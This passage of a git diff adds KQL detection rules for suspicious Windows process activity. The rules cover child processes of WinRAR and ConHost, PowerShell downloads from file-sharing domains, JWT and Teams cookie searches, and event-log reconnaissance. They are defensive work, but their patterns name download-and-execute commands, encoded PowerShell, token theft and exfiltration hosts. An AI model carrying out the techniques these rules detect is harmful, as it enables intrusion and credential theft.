+| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_winrar_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_winrar_exe.kql
new file mode 100644
index 00000000..ee470fcf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_winrar_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Child Process Of WinRAR.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: medium
+// Description: Detects potentially suspicious child processes of WinRAR.exe.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\WinRAR.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_processes_spawned_by_conhost.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_processes_spawned_by_conhost.kql
new file mode 100644
index 00000000..7f7bb963
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_processes_spawned_by_conhost.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Processes Spawned by ConHost
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1202, attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`.
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "cscript.exe", "mshta.exe", "powershell_ise.exe", "powershell.exe", "pwsh.dll", "regsvr32.exe", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\conhost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_cmd_shell_output_redirect.kql b/KQL/rules/windows/process_creation/potentially_suspicious_cmd_shell_output_redirect.kql
new file mode 100644
index 00000000..996d8e1c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_cmd_shell_output_redirect.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious CMD Shell Output Redirect
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: medium
+// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
+// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and (((ProcessCommandLine contains ">" and ProcessCommandLine contains "%APPDATA%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TEMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%USERPROFILE%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\ProgramData\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Temp\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Users\\Public\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Windows\\Temp\\")) or ((ProcessCommandLine contains " >" or ProcessCommandLine contains "\">" or ProcessCommandLine contains "'>") and (ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_command_targeting_teams_sensitive_files.kql b/KQL/rules/windows/process_creation/potentially_suspicious_command_targeting_teams_sensitive_files.kql
new file mode 100644
index 00000000..c7a80863
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_command_targeting_teams_sensitive_files.kql
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Command Targeting Teams Sensitive Files
+// Author: @SerkinValery
+// Date: 2022-09-16
+// Level: medium
+// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
+// The database might contain authentication tokens and other sensitive information about the logged in accounts.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Microsoft\\Teams\\Cookies" or ProcessCommandLine contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_desktop_background_change_using_reg_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_desktop_background_change_using_reg_exe.kql
new file mode 100644
index 00000000..41d7f565
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_desktop_background_change_using_reg_exe.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious Desktop Background Change Using Reg.EXE
+// Author: Stephen Lincoln @slincoln-aiq (AttackIQ)
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
+// This is a common technique used by malware to change the desktop background to a ransom note or other image.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
+// False Positives:
+//   - Administrative scripts that change the desktop background to a company logo or other image.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_dll_registered_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_dll_registered_via_odbcconf_exe.kql
new file mode 100644
index 00000000..ad4ecb69
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_dll_registered_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious DLL Registered Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "REGSVR " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_electron_application_commandline.kql b/KQL/rules/windows/process_creation/potentially_suspicious_electron_application_commandline.kql
new file mode 100644
index 00000000..2da6049e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_electron_application_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Electron Application CommandLine
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: medium
+// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Legitimate usage for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--browser-subprocess-path" or ProcessCommandLine contains "--gpu-launcher" or ProcessCommandLine contains "--renderer-cmd-prefix" or ProcessCommandLine contains "--utility-cmd-prefix") and ((FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\code.exe" or FolderPath endswith "\\discord.exe" or FolderPath endswith "\\GitHubDesktop.exe" or FolderPath endswith "\\keybase.exe" or FolderPath endswith "\\msedge_proxy.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\slack.exe" or FolderPath endswith "\\Teams.exe") or (ProcessVersionInfoOriginalFileName in~ ("chrome.exe", "code.exe", "discord.exe", "GitHubDesktop.exe", "keybase.exe", "msedge_proxy.exe", "msedge.exe", "msedgewebview2.exe", "msteams.exe", "slack.exe", "Teams.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_event_viewer_child_process.kql b/KQL/rules/windows/process_creation/potentially_suspicious_event_viewer_child_process.kql
new file mode 100644
index 00000000..da91e6df
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_event_viewer_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Event Viewer Child Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
new file mode 100644
index 00000000..a3e98fd2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-09-09
+// Level: medium
+// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
+// This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.discovery, attack.t1552, attack.t1087
+// False Positives:
+//   - Legitimate usage of the utility by administrators to query the event log
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "-InstanceId 462") or (ProcessCommandLine contains ".eventid -eq 462") or (ProcessCommandLine contains ".ID -eq 462") or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains ".eventid -eq 4778" or ProcessCommandLine contains ".ID -eq 4778" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "System[EventID=4778]" or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains ".eventid -eq 25" or ProcessCommandLine contains ".ID -eq 25" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25") or ProcessCommandLine contains "System[EventID=25]" or ProcessCommandLine contains "-InstanceId 1149" or ProcessCommandLine contains ".eventid -eq 1149" or ProcessCommandLine contains ".ID -eq 1149" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "1149") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "1149") or ProcessCommandLine contains "System[EventID=1149]" or ProcessCommandLine contains "-InstanceId 21" or ProcessCommandLine contains ".eventid -eq 21" or ProcessCommandLine contains ".ID -eq 21" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "21") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "21") or ProcessCommandLine contains "System[EventID=21]" or ProcessCommandLine contains "-InstanceId 22" or ProcessCommandLine contains ".eventid -eq 22" or ProcessCommandLine contains ".ID -eq 22" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "22") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "22") or ProcessCommandLine contains "System[EventID=22]") or (ProcessCommandLine contains "Microsoft-Windows-PowerShell" or ProcessCommandLine contains "Microsoft-Windows-Security-Auditing" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-RemoteConnectionManager" or ProcessCommandLine contains "Microsoft-Windows-Windows Defender" or ProcessCommandLine contains "PowerShellCore" or ProcessCommandLine contains "Security" or ProcessCommandLine contains "Windows PowerShell")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_execution_from_parent_process_in_public_folder.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
new file mode 100644
index 00000000..024f6650
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution From Parent Process In Public Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1564, attack.t1059
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript")) and InitiatingProcessFolderPath contains ":\\Users\\Public\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_pdqdeployrunner.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_pdqdeployrunner.kql
new file mode 100644
index 00000000..34615381
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_pdqdeployrunner.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Execution Of PDQDeployRunner
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-22
+// Level: medium
+// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Legitimate use of the PDQDeploy tool to execute these commands
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\TEMP\\" or FolderPath contains "\\AppData\\Local\\Temp") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -encodedcommand " or ProcessCommandLine contains " -w hidden" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "http" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-")) and InitiatingProcessFolderPath contains "\\PDQDeployRunner-"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql
new file mode 100644
index 00000000..8212cce7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-25
+// Level: medium
+// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql
new file mode 100644
index 00000000..1e15f8da
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-13
+// Level: medium
+// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".txt") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql
new file mode 100644
index 00000000..a486363a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_googleupdate_child_process.kql b/KQL/rules/windows/process_creation/potentially_suspicious_googleupdate_child_process.kql
new file mode 100644
index 00000000..d7aa77df
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_googleupdate_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious GoogleUpdate Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" and (not((isnull(FolderPath) or (FolderPath contains "\\Google" or (FolderPath endswith "\\setup.exe" or FolderPath endswith "chrome_updater.exe" or FolderPath endswith "chrome_installer.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql b/KQL/rules/windows/process_creation/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql
new file mode 100644
index 00000000..78f70d80
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary
+// Author: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-21
+// Level: medium
+// Description: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.007
+// False Positives:
+//   - Legitimate scripts using Node.js with these modules
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "execSync" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains "fs" and ProcessCommandLine contains "path" and ProcessCommandLine contains "zlib") and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_jwt_token_search_via_cli.kql b/KQL/rules/windows/process_creation/potentially_suspicious_jwt_token_search_via_cli.kql
new file mode 100644
index 00000000..c09efbd5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_jwt_token_search_via_cli.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious JWT Token Search Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), kagebunsher
+// Date: 2022-10-25
+// Level: medium
+// Description: Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG".
+// JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.
+// Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "eyJ0eXAiOi" or ProcessCommandLine contains "eyJhbGciOi" or ProcessCommandLine contains " eyJ0eX" or ProcessCommandLine contains " \"eyJ0eX\"" or ProcessCommandLine contains " 'eyJ0eX'" or ProcessCommandLine contains " eyJhbG" or ProcessCommandLine contains " \"eyJhbG\"" or ProcessCommandLine contains " 'eyJhbG'") and (ProcessCommandLine contains "find " or ProcessCommandLine contains "find.exe" or ProcessCommandLine contains "findstr" or ProcessCommandLine contains "select-string " or ProcessCommandLine contains "strings")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql b/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql
new file mode 100644
index 00000000..d320293e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious NTFS Symlink Behavior Modification
+// Author: frack113, The DFIR Report
+// Date: 2022-03-02
+// Level: medium
+// Description: Detects the modification of NTFS symbolic link behavior using fsutil, which could be used to enable remote to local or remote to remote symlinks for potential attacks.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1222.001
+// False Positives:
+//   - Legitimate usage, investigate the parent process and context to determine if benign.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "fsutil" and ProcessCommandLine contains "behavior" and ProcessCommandLine contains "set" and ProcessCommandLine contains "SymlinkEvaluation") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "R2L:1" or ProcessCommandLine contains "R2R:1" or ProcessCommandLine contains "L2L:1")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_office_document_executed_from_trusted_location.kql b/KQL/rules/windows/process_creation/potentially_suspicious_office_document_executed_from_trusted_location.kql
new file mode 100644
index 00000000..d224b552
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_office_document_executed_from_trusted_location.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Office Document Executed From Trusted Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: high
+// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
